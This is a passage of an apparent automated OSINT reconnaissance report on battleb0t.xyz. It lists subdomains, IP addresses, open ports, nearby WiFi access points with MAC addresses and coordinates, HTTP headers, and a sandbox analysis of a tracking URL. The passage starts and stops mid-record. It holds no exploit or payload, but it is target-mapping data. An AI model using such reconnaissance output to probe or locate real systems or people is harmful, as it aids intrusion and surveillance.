hdHRsZWIwdC54eXqCEXd3dy5iYXR0bGViMHQueHl6MEwGA1UdIARFMEMwCAYGZ4EMAQIBMDcGCysGAQQBgt8TAQEBMCgwJgYIKwYBBQUHAgEWGmh0dHA6Ly9jcHMubGV0c2VuY3J5cHQub3JnMIIBBgYKKwYBBAHWeQIEAgSB9wSB9ADyAHcAejKMVNi3LbYg6jjgUh7phBZwMhOFTTvSK8E6V6NS61IAAAGGhnCAVAAABAMASDBGAiEAh/Y8suDCe/RZMkn/hO7hrF2hfoTeuKySO5eYbccRB9ACIQCOoXkcH72OFd6rl/5A4dnCHD5VPTnfiLg+MDLqz1Gg8wB3AOg+0No+9QY1MudXKLyJa8kD08vREWvs62nhd31tBr1uAAABhoZwgDYAAAQDAEgwRgIhAMDKSjoBecX3TRhscOh0pPwxXkb/27xVeRxr0yp3M5J9AiEAs2yzzZRuQAdUQ84z4D/CSUjcGSNE5J2LfuF/Rs4Y77YwDQYJKoZIhvcNAQELBQADggEBALLjqCzluns+jvveBcnb3xDhOkrUyOkWdjExuB2H40IVXNkB0eMhFJYNA9arKrtu2pcQ/rEDSKt+bXuWbeA6WumULoOuP6iljCU6qcUdY4oNVU1UyDoX1HJydnidKSo73vUKTNhEgh8aKcxcLL9+23F8UOOR/pU/04dfMDdI7GO2oawzrGMFso9t7p4urFBZ6UFG0nFlBRdC2T4hndeQOaaPLehK1P9tnjLGggWPpLV0tHDfKEtQyBs2Gq7Pe6uSI+Z3l/JHpLBS8p3PvmiiivIv8GYL0zQqx4o1xBwzLeWQ3lanl4Z8l8lFj5lhIgA9qrKHDTW7TPP4HPiZwejRMMY=', u'sha256': u'cb894c56576f5179076d6e1c59c2fc91b3c72b3d588e1a67aa08729c92b84b1f', u'type': u'cert'}, u'dns_names': [u'battleb0t.xyz', u'www.battleb0t.xyz'], u'tbs_sha256': u'5d9c34221e2de124f32114bf34c005fc414285d1b7cc7cab0bb0bd4e745c7797', u'id': u'4869370950', u'issuer': {u'pubkey_sha256': u'8d02536c887482bc34ff54e41d2ba659bf85b341a0a20afa | battleb0t.xyz |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | WLAN (Net ID: 00:01:24:F0:97:C1) | 37.780462,-122.390564 |
| 2023-05-12 02:54:23 | HTTP Status Code | No | Web Spider | 0 | 0 | 5 | 0 | None | 403 | https://www.ayhu.xyz/?__cf_chl_f_tk=eArohGzIRNubxh3D6IFMRkkS6OUaNS008kBgg4I5pUY-1683860063-0-gaNycGzNCiU |
| 2023-05-12 02:45:35 | Internet Name | No | DNSDumpster | 0 | 0 | 1 | 0 | None | kekw.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:01:31 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.61): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:08:50 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.123 | 35.229.48.116 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | Troop (Net ID: 00:0E:F4:ED:81:91) | 37.751, -97.822 |
| 2023-05-12 03:00:57 | Malicious Co-Hosted Site | Yes | VXVault.net | 0 | 1 | 2 | 0 | None | VXVault Malicious URL List [github.com]
http://vxvault.net/URL_List.php | github.com |
| 2023-05-12 02:44:05 | SSL Certificate - Issued to | No | CertSpotter | 0 | 0 | 1 | 0 | None | CN=oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:23:35 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.13:8443 | 188.114.96.0/24 |
| 2023-05-12 03:08:49 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 3 | 0 | None | 35.229.48.108 | 35.229.48.116 |
| 2023-05-12 02:44:24 | Internet Name | No | DNS Resolver | 0 | 0 | 2 | 0 | None | nwapi.battleb0t.xyz | CN=nwapi.battleb0t.xyz |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-opener-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:00:58 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 0101.github.io | 185.199.111.153 |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 5 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c5eeb1a42bf')"></div>
<form id="challenge-form" action="/?__cf_chl_f_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="OwKUCDNMgBcJHVKY8nwcXEP4QH6PT2kVm2HBGkp44qM-1683861862-0-AWLoc992boZljuKuI-OBA8JKemVnVUC1OpOL5WA6H__Iq90123kv27raPeBnAM1gG8-u_GUHUIjkNRARNHi-eimNvmJ4rPPxMkUV2QmYUEqMIZBr0A65Rs8LmsZu82c9s9x6llue0RdEW_caMvviu63PT1rv_bBKXMf1rHRuL651jz2WFzUdCtMQpW6Egz9tRVRjq5p5DSqDh55BkcMfXifbvXVDgCJtfVyuppJGXIw1O3dWJT8pln-UY4GtVbRsMFPevbWJODfBaMma6BpIVfB3OcO1PwoUlljtOyyIFegfArGbCDdTMuWW7MTLDlShBnu-Lhu5vOc-Ud28hWS6Af2dBCBcHh5XGl_1kuftIN3x2Yrz1OgV60xO0_Ft4cvMx22_Xbt7KQegGiYk7J4oDHrBq-69T02ReScczZXd4TQyXoU9qHcKZvKsNQmpV8fSqGGhR6xiFbU8_QFDTT8jXa5OZWcXPnNRfc6AD50gDy5Q6ftPGx8ku1bIa-BYJl0tEjfjvdrLmpKOgvt9HqryqBGQGW4sUnihX9ydJUDsex46ckUHkCXeufqZn5AD6MtN5oYFRHHhtjXnJcAp8WeElzI07rPkFj51H8EcsL4wD4_j8spF714slOYp5I3UNmZcpEY7hPbC_UrXxeNbe8Vb8W4O-5IvI2tAlXSs551O3aDHuLsWbsArUO69cE4cxnurB8E2VDklGwp0UjIA1ZbCcpeAqz4V9q7Rwf-aIp9UCsMIdDd03vJdv4BEy-C0uG1-hj0OttJBemux1PqA1Oxh9yKktn6NkFswTsNgRXA8FQdJPB55BpT7hX34f--63YYznOGOdwPnDQcV50l_KNiuyd5iXvh6Ql-Y6gEkavuOPF7ZE9H3PdFRCjRHpQfMmVGrr33gOKExrD-4XicoHlXnlplsncZhnYm0eFVn58vM-kJzFzoAYzJQ6LHPK-rLwUXHzdM6AMR_OdpTBapGpYQut19xKMEhf7XFlJB3i5IvPoLlbKbnM6DASBEm9gloHgHGhLjyH1D86MFl7dLmOy7HXf9Dt59vLXRTySh361-MOVviaFEilkvPgOfzGNeoCglzenOA29aR5-LvniWcnxwdMx19GiPvWq5dL0FsY-IaI8C318jSGkDd19eYdtZYb5Trduu1XD0QykyRaGCiXFCKXs9qPoDsrChJMKxRJKG6txIjwI-hz9vzBTixzmEz31H_03qyn6xl9MHLNpR4uoY5ttVTXocR7hDlDoTIHoxw4bmwvZZns-g2xlnvOFfDm6Z3ymoAiBTVXb9UI0-FgG-KNuyY4Y49oFMfBVNbHXGX0NQ7nC0zQXw0LMG69KhyLsZAbvBSEmnEAy81l38C-eHlDjsSlcF_pEqbs8b24FlZ_Ycg5qR-qEhQLJ_IivsUFKo4fWdGLbL7vtldXPDD9ikL5U_HiqKqxo8b-MjuggAlbaMrnYqciKkrFAYhtlSn6vG0BcwQbEZVsrKxnf1U5iCKBIDK1cXcJ7qxw6FoFlpbsT9cf9V-SFcvkbQR4ynJNaf1tfeZ6cTUfprkZy8GusVJdlQcoHnz3EkTZyvTp96y0si0IlMRhE1eqk8AoDep7FzFKBEGzL7gDQU2Jn1nwjFLKXoqiHtb5T9bBlt5hhj_Ci6kEYTQdRQGW8cTzRzMqPyN66hhKyLGLcgc7GZethYHaIwxFGmc_-FTVSTksGANC23y4Y0EQ958se1s8VzeS_g_Q7AoqHmpjBZ2xnQukuWvbqKS_jTYtZPUwascKOCTAnovpYgH8wEPiBeTBcqYmCRQUV1WQ5Sl2pAf4AfP3RpDCeUM9RYjWn8EtaTb5Bhr_k9830NT-b8RF7puAAgLTTKA4q6e5vn2ewBbnV7XJ0GouaXcDgkRUitPYbV97TyYXMDG5jrsoDMwKExF3yfQ65a4HURQJ3I0-2cN6cUG-Y-wfJ_ULyEJZKHCJ0AAHYnUol27xezw1EIch91oOc2hzP8yiIMXI8T3Yo-aupeX9LKThZP5WSadqXIdAKdNvRnbMtEuMzDmhmp29m0ybwuinUP8O7RYb7j1B42foptRV6LcZaaB7GxtNFE6cbYJEgKR3EVXJ9v1X1LNujPJ_2-MknLO1BAr44SCZq4n5UiQqguKB0ip0JOSrV9oOqb3mxkBI20TA2suDdWcUUiDjuemwe_R_SFef-VIvq4m-JFV_iinHTfs5xSvQj_DV9QpslncdUm4d3a4BDcKZYMI_YaNhT37IZDWJKLAZUX_a4_bgw8NO47VSFunBOSL4CABnjTz1vyLJql2e3xxqjgafM7I6m59nuymQeY8F1qvaKmYyA1bIjmlBpJjIy-YvbCvFy0xRzKQttdY1KMKqJpm2hMaWno-PDyzEL6Hdcvve0j1uskEzjTLP_kK22Nhie7r9a88EK-EJpd4ugQ4u7t-kbsifC-M0rVW6p8dFHSbqa0iaKw84zeu6BHIQYJpq8ZELQZOExGCyk3QdEEKgtXofElfaYiQeb5hxWCA9mTHgbKSVuU6D2o">
</form>
</div>
</div>
<script>
(function(){
window._cf_chl_opt={
cvId: '2',
cZone: 'ayhu.xyz',
cType: 'managed',
cNounce: '2801',
cRay: '7c5f8c5eeb1a42bf',
cHash: '66932cb8b087b32',
cUPMDTk: "\/?__cf_chl_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA",
cFPWv: 'b',
cTTimeMs: '1000',
cMTimeMs: '0',
cTplV: 5,
cTplB: 'cf',
cK: "",
cRq: {
ru: 'aHR0cHM6Ly9heWh1Lnh5ei8=',
ra: 'TW96aWxsYS81LjAgKFdpbmRvd3MgTlQgMTAuMDsgV2luNjQ7IHg2NDsgcnY6NjIuMCkgR2Vja28vMjAxMDAxMDEgRmlyZWZveC82Mi4w',
rm: 'R0VU',
d: 'bBrUwSR1j4q+jiK831F3uz4Yhp8vDXUt4BefqtjwDOM1gm//5501ZpnQ7c811CiMG7EvRE/6yKWzdSdEgeqlKrPobmKgPq4s4sf5keh0JSpRTFqyThcJtJJr1NWRsfypsHrBAC+XbLByIcYvWD8TmKM3Lhv7t6zi6igSlfKXyW90iyZVyqiH832ebLGiO/GSvvShgl1OfVaUjymgCjY8n2bwTQnz1bukp+HAMcsu1wZ3PK1kdPfO+f6tcNFOs2NyMVJRmQfONHTCt2nKiRK6ouj1Q6Ih203tDYZ5b0WmDfvIz7g3fRTkgLvOxApauVZZ+Pn/FqSlbbEuJ5Y0aM2tvO/8QCq5RpbNSQjdvneQgssTK9l1UKSvRFVWE5iKT4EQV1PBMPxYDBJ+CvYrUHSFx9P+yC9YQqnfqdmyJ9FgXN/PhzJhVNTNCuoNVqV31Wu1Q5EP48PNidXTO4PmCrJKW8p3kSzZx/9Yl/8dCnD9smPeVcx5F6nXmnXOfIJiYKRBRZ58nvyXlIirQZyiZSy0uk2tqc5S71/Aw3pbF23wUkCK/NSr0bVfW1AY4v9YGH9L',
t: 'MTY4Mzg2MTg2Mi4yMjQwMDA=',
m: 'kADszgADVaHA/mRyw7h+MKSs6RoLc0QTNBq8+AYYMs8=',
i1: 'q0RPvxk//GqHpe4FgiHvYg==',
i2: 'CV688EYHriA2UWvDyWxv3g==',
zh: '5CSFfnxjX733uDcOs5b2wVtZyxz+ok/bRl8GY+r6VYM=',
uh: 'kmwDWEJPoYUZn2LK7fziBR63kfsS15IQSFUgqqBKdMU=',
hh: 'MOFk2Z71D85oDgM12X+iKPzOW00XacPzwtfsLetPJXU=',
}
};
var trkjs = document.createElement('img');
trkjs.setAttribute('src', '/cdn-cgi/images/trace/managed/js/transparent.gif?ray=7c5f8c5eeb1a42bf');
trkjs.setAttribute('alt', '');
trkjs.setAttribute('style', 'display: none');
document.body.appendChild(trkjs);
var cpo = document.createElement('script');
cpo.src = '/cdn-cgi/challenge-platform/h/b/orchestrate/managed/v1?ray=7c5f8c5eeb1a42bf';
window._cf_chl_opt.cOgUHash = location.hash === '' && location.href.indexOf('#') !== -1 ? '#' : location.hash;
window._cf_chl_opt.cOgUQuery = location.search === '' && location.href.slice(0, location.href.length - window._cf_chl_opt.cOgUHash.length).indexOf('?') !== -1 ? '?' : location.search;
if (window.history && window.history.replaceState) {
var ogU = location.pathname + window._cf_chl_opt.cOgUQuery + window._cf_chl_opt.cOgUHash;
history.replaceState(null, null, "\/?__cf_chl_rt_tk=VqQIpv85XrbB73FISUPAb3YOKzrkafpohMHe42yb99c-1683861862-0-gaNycGzNChA" + window._cf_chl_opt.cOgUHash);
cpo.onload = function() {
history.replaceState(null, null, ogU);
};
}
document.getElementsByTagName('head')[0].appendChild(cpo);
}());
</script>
</body>
</html>
|
| 2023-05-12 02:54:07 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Cf_Ray": ["7c5445d12f8c1040-ORD"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Date": ["<REDACTED>"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 2606:4700:3031::ac43:8709 |
| 2023-05-12 02:56:15 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 5 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=qVGOB1rQJjQIM8j8t5Spm5SzuRznIdJDuYO5Jbpn3fZk%2BJxIqln47OJIYIKFh9H9g0ehIc6QmUjGxpPhNXDavBCNcEEJOQv%2BvWtEqWQkF532xy%2FfGHFy%2BS9fyHqoDn0%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 02:54:23 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f6071cb5443bc-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:01:27 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.4): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:18:54 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | MSCI (Net ID: 00:11:93:03:4B:10) | 32.8608, -79.9746 |
| 2023-05-12 03:23:09 | Open TCP Port | No | Pulsedive | 0 | 0 | 3 | 0 | None | 188.114.96.0:80 | 188.114.96.0/24 |
| 2023-05-12 03:34:01 | Raw File Meta Data | No | Binary String Extractor | 0 | 0 | 4 | 0 | None | "Exif
sgssso
<Qwm7
>6x.O
x>t7?
g$sy?
.b97<
/Ggy!
l/5-o
ggs43Z
x.o.n>
NNEsz
gmuss
Mswy5
dIys6
>t6w6
03Ryr\G
a>0xM
g_on8
9!6sBsmms
?r:\t
L5M3O
nq_JxO
`uns?g
F1_?J
$vw3C
?.O:H
Gq$rMmo
0y7?i
<?qgg
WYeyq$
!um_KM
ykmsrzz
?2Cm7
3>O0?
irIyo
t.Iof?y
R\y2I
tnt"3
!t5K?/
hfIoq'
bI>sy
w?f?f?
<Aq"Cio
/uMbO
> Ige
>km7M
1$vw0
y.n/"
/uM>9
njKym
v:Ky$
ryw2Com
s<U?o
v?R.>
hGydd
soyg'
:7Ieq
5zO-$
2pMsw
wGo$w?<w
:xssms
jVw:o
.?ygs
nn9?m
oO_n:
nFumS
W7ofc
U95 5
Gs\-?o
ry>f<
gae$w
?2kmO
sIyf/!
t8y<?
\Cwy1
_Bx_K
oeqq$
g5b9c
/2?.o/
hcg>o
kkkn?
/`0E'
xn/<a
uwosm
.<7qq
zdWqk
$1\Mm
rzW?'
tx<Iogss
ldU9?
K?.?/
r\isI
?6gAs
$Kxn<
nnnOS
qyooo
Hc<M?
Ej\Ioy'
x'8_a | https://funny.battleb0t.xyz/images/random_3.jpg |
| 2023-05-12 02:48:47 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://n.top/i,right:n.right/a,bottom:n.bottom/i,left:n.left/a,x:n.left/a,y:n.top/i', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://u8718684.ct.sendgrid.net/ls/click?upn=c5xukOe5Km-2FX79RKM6mUHkScXT7d3MNfbWP0FHOMHMSulHtt7TNqqdRBsqy10BrNUPGt1JnDtK6UMujmNu-2Bt5QYPlc-2BQrkgsqzJjN5vxSR6z81-2Fizrzyogjzfo-2BS9lx85Rb5sSUZZtUDNWUm86HtmS9EQuA-2BU4RfDy5n3r8sM3E-3DN0PW_-2F2Ce3NhTMiWIwvgWzERJRAygrU5zMIOZQxSuADrBlh7TNOxfvwo3CxH1Ohu8ySaee3krnnMOpDWXeZ1Bk4KZX9BkUZ8Edttb71LkdIzlOxeoHONdzpW8pWlgXqx83YJopFXPvRQGIv7Sn6HH66wOe3aU2Y0Prx-2FGZ3tSyA-2BkVN0gySn2zKqzQQmjicFw5za2NlxBl9CrGRWVutMdwUrhmoYf-2FXzIW7IQrIrlKUnWzPPY-2FpjVlisUhaE4YaXyGPCLka2hWOa0554QN2BjNnsHe6dwjndEUsQJ85b-2FnY955ArnKu76MKNRVCnjUZuZzCTQRtAnEn328443nOkyocNgPHpNa-2BICLRgB6RuqAUvD3kdSXakjxhKyTs0-2Bkt1Te3Tb-2B8aJjG6GIstuUjl-2BbQLHM-2FGnlea9WKNJpf8hKv6-2B7JI-3D', u'signatures': [{u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_4036"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fc4_IE_EarlyTabStart_0xb90_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fc4_ConnHashTable<4036>_HashTable_Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fc4_IESQMMUTEX_0_303"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_fc4_IESQMMUTEX_0_331"\n "\\Sessions\\1\\BaseNamedObjects\\{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "Local\\InternetShortcutMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "IsoScope_fc4_IESQMMUTEX_0_331"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_fc4_IESQMMUTEX_0_519"\n "IsoScope_fc4_IE_EarlyTabStart_0xb90_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"167.89.115.121:443"\n "104.18.6.8:443"\n "156.146.53.13:443"\n "152.199.5.152:443"\n "151.101.2.137:443"\n "162.247.241.2:443"\n "74.125.137.155:443"\n "13.227.74.109:443"\n "34.192.63.2:443"\n "185.199.110.153:443"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"bam-cell.nr-data.net"\n "cdn.ezshield.net"\n "cigna.identityforce.com"\n "js-agent.newrelic.com"\n "maxst.icons8.com"\n "platform.linkedin.com"\n "purecatamphetamine.github.io"\n "secure.identityforce.com"\n "stats.g.doubleclick.net"\n "u8718684.ct.sendgrid.net"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-10', u'name': u'Found a reference to a known community page', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 7, u'threat_level': 0, u'type': 2, u'description': u'"platform.linkedin.com" (Indicator: "linkedin.com")\n "{state:0,transportUrl:b,context:c,parent:ki()},J(91);else{var f="/gtag/destination?id="+encodeURIComponent(a)+"&l="+ke.ca+"&cx=c";No()&&(f+="&sign="+ke.Zd);var g=te||ve?Mo(b,f):void 0;g||(g=wl("https://","http://",ke.qd+f));ei().destination[a]={state:1,context:c,parent:ki()};Hb(g)}};function Oo(){if(ci()){return!0}return!1};var Ro=new RegExp(/^(.*\\.)?(google|youtube|blogger|withgoogle)(\\.com?)?(\\.[a-z]{2})?\\.?$/),So={cl:["ecl"],customPixels:["nonGooglePixels"],ecl:["cl"],ehl:["hl"],hl:["ehl"],html:["customScripts","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],customScripts:["html","customPixels","nonGooglePixels","nonGoogleScripts","nonGoogleIframes"],nonGooglePixels:[],nonGoogleScripts:["nonGooglePixels"],nonGoogleIframes:["nonGooglePixels"]},To={cl:["ecl"],customPixels:["customScripts","html"]," (Indicator: "youtube")\n "GET /badges/js/profile.js HTTP/1.1Accept: application/javascript, */*;q=0.8Referer: https://cigna.identityforce.com/app/Register?Type=PROVISIONAL&VALUE=C66B9A18A6A7&RETAILERCODE=Cigna&GNDNRLL=PSSAccept-Language: en-USUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like GeckoAccept-Encoding: gzip, deflateHost: platform.linkedin.comDNT: 1Connection: Keep-Alive" (Indicator: "linkedin.com")'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar280F.tmp" as clean (type is "data")\n Antivirus vendors marked dropped file "Tar27BF.tmp" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'identifier': u'binary-5', u'name': u'Drops cabinet archive files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'"Cab27BE.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab27BE.tmp]- [targetUID: 00000000-00000732]\n "77EC63BDA74BD0D0E0426DC8F8008506" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%LOCALAPPDATA%\\ow\\Microsoft\\CryptnetUrlCache\\Content\\77EC63BDA74BD0D0E0426DC8F8008506]- [targetUID: 00000000-00000732]'}, {u'category': u'Installation/Persistence', u'origin': u'Binary File', u'identifier': u'binary-0', u'name': u'Dropped files', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1105', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1105', u'relevance': 3, u'threat_level': 0, u'type': 8, u'description': u'"US_1_.svg" has type "SVG Scalable Vector Graphics image"- [targetUID: N/A]\n "urlblockindex_1_.bin" has type "data"- [targetUID: N/A]\n "main.fe4aff76.chunk_1_.js" has type "ASCII text with very long lines with no line terminators"- [targetUID: N/A]\n "2.96415f03.chunk_1_.js" has type "ASCII text with very long lines"- [targetUID: N/A]\n "gtm_1_.js" has type "UTF-8 Unicode text with very long lines"- [targetUID: N/A]\n "application_1_.css" has type "UTF-8 Unicode (with BOM) text with very long lines"- [targetUID: N/A]\n "la-solid-900_1_.eot" has type "Embedded OpenType (EOT) la-solid-900 family"- [targetUID: N/A]\n "Tar280F.tmp" has type "data"- Location: [%TEMP%\\Tar280F.tmp]- [targetUID: 00000000-00000732]\n "saleslanding_1_.css" has type "UTF-8 Unicode (with BOM) text with very long lines"- [targetUID: N/A]\n "line-awesome.min_1_.css" has type "ASCII text with very long lines"- [targetUID: N/A]\n "Cab27BE.tmp" has type "Microsoft Cabinet archive data Windows 2000/XP setup 62582 bytes 1 file at 0x2c +A "authroot.stl" number 1 6 datablocks 0x1 compression"- Location: [%TEMP%\\Cab27BE.tmp]- [targetUID: 00000000-00000732]\n "analytics_3_.js" has type 